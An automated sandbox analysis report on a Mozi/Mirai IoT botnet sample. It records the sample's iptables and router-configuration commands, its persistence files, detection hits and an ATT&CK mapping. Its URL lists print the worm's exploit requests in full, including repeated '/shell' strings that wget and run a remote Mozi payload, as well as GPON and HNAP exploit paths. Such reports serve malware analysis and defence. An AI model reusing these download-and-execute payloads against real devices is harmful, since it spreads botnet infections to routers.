Source: /tmp/Mozi.m.3 (PID: 5297)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
Source: /tmp/Mozi.m.3 (PID: 5299)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
Source: /tmp/Mozi.m.3 (PID: 5301)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5304)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5307)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5310)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5313)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5316)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5319)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5322)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5325)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5328)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5332)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5335)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
Source: /tmp/Mozi.m.3 (PID: 5347)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5350)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5353)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5356)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5359)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5362)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5365)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT"
Source: /tmp/Mozi.m.3 (PID: 5368)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT"

Source: submitted sample

Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 4 (Illegal instruction) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/init.d/S95baby.sh	Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/init.d/keyboard-setup.sh	Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/init.d/console-setup.sh	Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /usr/bin/gettext.sh	Jump to dropped file
Source: /tmp/Mozi.m.3 (PID: 5224)	File: /usr/bin/rescan-scsi-bus.sh	Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 32814 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35686 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 81 -> 35686
Source: unknown	Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 59450 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 59450 -> 81

Source: /tmp/Mozi.m.3 (PID: 5220)	Queries kernel information via 'uname':
Source: /tmp/Mozi.m.3 (PID: 5224)	Queries kernel information via 'uname':
Source: /tmp/Mozi.m.3 (PID: 5234)	Queries kernel information via 'uname':

Source: kvm-test-1-run.sh.12.dr	Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: ( $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append "$qemu_append $boot_args" > $resdir/qemu-output 2>&1 & echo $! > $resdir/qemu_pid; wait `cat $resdir/qemu_pid`; echo $? > $resdir/qemu-retval ) &
Source: functions.sh2.12.dr	Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: kvm.sh.12.dr	Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: echo Monitoring qemu job at yet-as-unknown pid
Source: kvm.sh.12.dr	Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh2.12.dr	Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: QEMU="`identify_qemu vmlinux`"
Source: Mozi.m.3, 5220.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5222.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5242.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp	Binary or memory string: Gx86_64/usr/bin/qemu-arm/tmp/Mozi.m.3SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/Mozi.m.3
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$resdir/console.log"`"
Source: kvm.sh.12.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.12.dr	Binary or memory string: identify_qemu_args () {
Source: functions.sh2.12.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386)
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh2.12.dr	Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid $[0-9]$.$/\1/p" $resdir/Warnings`"
Source: Mozi.m.3, 5220.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5222.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5242.1.00000000b2458519.00000000598fe62f.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: functions.sh2.12.dr	Binary or memory string: echo qemu-system-ppc64
Source: functions.sh2.12.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: functions.sh2.12.dr	Binary or memory string: echo qemu-system-aarch64
Source: kvm-recheck-rcu.sh.12.dr	Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.12.dr	Binary or memory string: # identify_qemu_append qemu-cmd
Source: kvm.sh.12.dr	Binary or memory string: print "needqemurun="
Source: functions.sh2.12.dr	Binary or memory string: identify_qemu_vcpus () {
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: if test $commandcompleted -eq 0 -a -n "$qemu_pid"
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: if test -z "$qemu_pid" \|\| kill -0 "$qemu_pid" > /dev/null 2>&1
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $resdir/console.log
Source: kvm.sh.12.dr	Binary or memory string: print "\tneedqemurun=1"
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: # Generate qemu -append arguments
Source: Mozi.m.3, 5220.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5222.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp, Mozi.m.3, 5242.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: Mozi.m.3, 5242.1.000000006f87d4dd.000000009fb95c8b.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Source: functions.sh2.12.dr	Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.12.dr	Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh2.12.dr	Binary or memory string: echo qemu-system-i386
Source: functions.sh2.12.dr	Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: kvm.sh.12.dr	Binary or memory string: print "if test -n \"$needqemurun\""
Source: functions.sh2.12.dr	Binary or memory string: echo qemu-system-x86_64
Source: functions.sh2.12.dr	Binary or memory string: identify_qemu () {
Source: parse-console.sh.12.dr	Binary or memory string: print_warning Console output contains nul bytes, old qemu still running?
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: sleep 10 # Give qemu's pid a chance to reach the file
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh2.12.dr	Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: functions.sh2.12.dr	Binary or memory string: qemu-system-aarch64)
Source: kvm.sh.12.dr	Binary or memory string: checkarg --qemu-args "(qemu arguments)" $# "$2" '^-' '^error'
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: echo Unknown PID, cannot kill qemu command
Source: functions.sh2.12.dr	Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.12.dr	Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: functions.sh2.12.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: echo $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: functions.sh2.12.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386\|qemu-system-aarch64)
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh2.12.dr	Binary or memory string: qemu-system-x86_64)
Source: functions.sh2.12.dr	Binary or memory string: qemu-system-aarch64)
Source: functions.sh2.12.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386)
Source: functions.sh2.12.dr	Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: qemu_pid=""
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: elif test -z "$qemu_pid"
Source: functions.sh2.12.dr	Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: Mozi.m.3, 5220.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5222.1.00000000b2458519.00000000598fe62f.rw-.sdmp, Mozi.m.3, 5242.1.00000000b2458519.00000000598fe62f.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: functions.sh2.12.dr	Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.12.dr	Binary or memory string: --qemu-args\|--qemu-arg)
Source: kvm.sh.12.dr	Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: kvm.sh.12.dr	Binary or memory string: TORTURE_QEMU_MEM="$TORTURE_QEMU_MEM"; export TORTURE_QEMU_MEM
Source: functions.sh2.12.dr	Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.12.dr	Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.12.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm.sh.12.dr	Binary or memory string: TORTURE_QEMU_MEM=$2
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh2.12.dr	Binary or memory string: specify_qemu_cpus () {
Source: functions.sh2.12.dr	Binary or memory string: qemu-system-i386)
Source: functions.sh2.12.dr	Binary or memory string: qemu-system-ppc64)
Source: functions.sh2.12.dr	Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.12.dr	Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm.sh.12.dr	Binary or memory string: print "needqemurun="
Source: functions.sh2.12.dr	Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh2.12.dr	Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh2.12.dr	Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: QEMU="`identify_qemu $base_resdir/vmlinux`"
Source: functions.sh2.12.dr	Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh2.12.dr	Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.12.dr	Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh2.12.dr	Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh2.12.dr	Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh2.12.dr	Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.12.dr	Binary or memory string: --qemu-cmd)
Source: kvm.sh.12.dr	Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: qemu_args="-enable-kvm -nographic $qemu_args"
Source: functions.sh2.12.dr	Binary or memory string: # identify_qemu builddir
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh2.12.dr	Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: kvm-test-1-run.sh.12.dr	Binary or memory string: if test -s "$resdir/qemu_pid"

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Mozi.m.3, type: SAMPLE
Source: Yara match	File source: 5222.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5220.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5242.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Mozi.m.3 PID: 5220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mozi.m.3 PID: 5222, type: MEMORYSTR
Source: Yara match	File source: /usr/networks, type: DROPPED

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 5220.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5222.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5242.1.00000000de7858ea.00000000135d740d.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Mozi.m.3, type: SAMPLE
Source: Yara match	File source: 5222.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5220.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 5242.1.0000000078984474.00000000a6149ca3.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Mozi.m.3 PID: 5220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mozi.m.3 PID: 5222, type: MEMORYSTR
Source: Yara match	File source: /usr/networks, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	1 .bash_profile and .bashrc	1 .bash_profile and .bashrc	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	12 Scripting	1 At (Linux)	1 At (Linux)	1 File and Directory Permissions Modification	1 Brute Force	1 Remote System Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 At (Linux)	Logon Script (Windows)	Logon Script (Windows)	12 Scripting	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	1 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	5 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Mozi.m.3	65%	Virustotal		Browse
Mozi.m.3	69%	Metadefender		Browse
Mozi.m.3	75%	ReversingLabs	Linux.Trojan.Mirai
Mozi.m.3	100%	Avira	LINUX/Mirai.lldau

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/networks	100%	Avira	LINUX/Mirai.lldau

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://pastebin.ca)	0%	Avira URL Cloud	safe
http://%s:%d/bin.sh;chmod	0%	Avira URL Cloud	safe
http://13.35.5.125:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.a;chmod	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;$	0%	Avira URL Cloud	safe
http://154.93.41.99:37215/ctrlt/DeviceUpgrade_1	0%	Avira URL Cloud	safe
http://87.17.124.195:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://154.209.180.104:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m	0%	Avira URL Cloud	safe
http://www.alsa-project.org/cardinfo-db/	0%	Avira URL Cloud	safe
http://171.25.175.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://23.44.16.109:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://%s:%d/bin.sh	0%	Avira URL Cloud	safe
http://www.alsa-project.org/alsa-info.sh	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;	0%	Avira URL Cloud	safe
http://205.198.160.107:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://1.9.218.126:80/HNAP1/	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.a;sh$	0%	Avira URL Cloud	safe
http://23.58.36.209:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://127.0.0.1:80/GponForm/diag_Form?images/	0%	Avira URL Cloud	safe
http://23.6.123.60:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://127.0.0.1:8080/GponForm/diag_Form?images/	0%	Avira URL Cloud	safe
http://114.142.213.80:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://127.0.0.1	0%	Avira URL Cloud	safe
http://www.alsa-project.org	0%	Avira URL Cloud	safe
http://121.151.98.14:80/HNAP1/	0%	Avira URL Cloud	safe
http://127.0.0.1sendcmd	0%	URL Reputation	safe
http://178.32.54.199:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://81.108.37.251:80/HNAP1/	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;/tmp/Mozi.m	0%	Avira URL Cloud	safe
http://104.25.119.143:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://purenetworks.com/HNAP1/	0%	URL Reputation	safe
http://188.215.82.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://www.alsa-project.org.	0%	Avira URL Cloud	safe
http://148.229.1.12:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://54.173.33.241:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://HTTP/1.1	0%	Avira URL Cloud	safe
http://93.41.229.147:80/HNAP1/	0%	Avira URL Cloud	safe
http://162.209.132.128:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://186.219.131.213:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	0%	Avira URL Cloud	safe
http://23.57.42.173:80/HNAP1/	0%	Avira URL Cloud	safe
http://23.1.122.127:80/HNAP1/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dht.transmissionbt.com	87.98.162.88	true	false	high
bttracker.acc.umu.se	130.239.18.158	true	false	high
router.bittorrent.com	67.215.246.10	true	false	high
router.utorrent.com	82.221.103.244	true	false	high
bttracker.debian.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://13.35.5.125:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://154.93.41.99:37215/ctrlt/DeviceUpgrade_1	false	Avira URL Cloud: safe	unknown
http://87.17.124.195:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://154.209.180.104:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://171.25.175.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://23.44.16.109:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://205.198.160.107:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://1.9.218.126:80/HNAP1/	true	Avira URL Cloud: safe	unknown
http://23.58.36.209:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://127.0.0.1:80/GponForm/diag_Form?images/	true	Avira URL Cloud: safe	unknown
http://23.6.123.60:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	true	Avira URL Cloud: safe	unknown
http://127.0.0.1:8080/GponForm/diag_Form?images/	true	Avira URL Cloud: safe	unknown
